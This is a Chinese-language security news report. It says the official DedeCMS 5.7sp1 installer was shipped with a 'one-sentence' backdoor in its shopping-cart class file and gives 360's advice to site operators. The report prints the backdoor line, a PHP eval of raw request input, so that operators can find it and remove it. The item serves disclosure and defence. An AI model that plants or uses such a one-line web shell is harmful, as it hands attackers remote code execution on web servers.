日前，織夢(mèng)內(nèi)容管理系統(tǒng)（DedeCMS）遭烏云漏洞平臺(tái)曝光稱，DedeCMS 5.7sp1官方安裝包被黑客植入后門。經(jīng)360安全檢測(cè)平臺(tái)檢測(cè)，該后門確實(shí)曾一度出現(xiàn)在織夢(mèng)官網(wǎng)版本中。為此，360于當(dāng)天緊急推出DedeCMS后門檢測(cè)服務(wù)，并已對(duì)大批中招網(wǎng)站發(fā)出郵件報(bào)警。

圖1：DedeCms被植入的后門代碼

據(jù)悉，DedeCMS正廣泛應(yīng)用于眾多企業(yè)網(wǎng)站、政府網(wǎng)站、高校網(wǎng)站及個(gè)人網(wǎng)站上，是國(guó)內(nèi)用戶量最大的PHP類CMS系統(tǒng)。360安全工程師分析發(fā)現(xiàn)，此次DedeCMS曝出的后門名為"一句話后門"，其惡意代碼存在于DedeCMS購(gòu)物車類文件中，凡是調(diào)用該購(gòu)物車類的文件均會(huì)觸發(fā)后門，從而導(dǎo)致整個(gè)網(wǎng)站甚至服務(wù)器遭黑客進(jìn)一步控制。

360建議，使用DedeCMS的網(wǎng)站站長(zhǎng)應(yīng)立刻檢測(cè)include/shoper.class.php文件中是否存在后門代碼"@eval(file_get_contents('php://input'));"，如存在應(yīng)刪除該行代碼，如不存在則證明沒有該"一句話后門"。

作為開源軟件，DedeCMS此次曝出后門并非個(gè)例。因?yàn)樵趪?guó)際上，Linux等多款著名的開源軟件也曾遭黑客植入后門。不過，烏云漏洞平臺(tái)公開的織夢(mèng)官方郵件顯示，織夢(mèng)開發(fā)團(tuán)隊(duì)否認(rèn)了產(chǎn)品曾被植入后門，但其官網(wǎng)上的DedeCMS版本在3月21日中午悄然進(jìn)行了修改。

圖2：測(cè)試驗(yàn)證PHP代碼可被DedeCMS后門執(zhí)行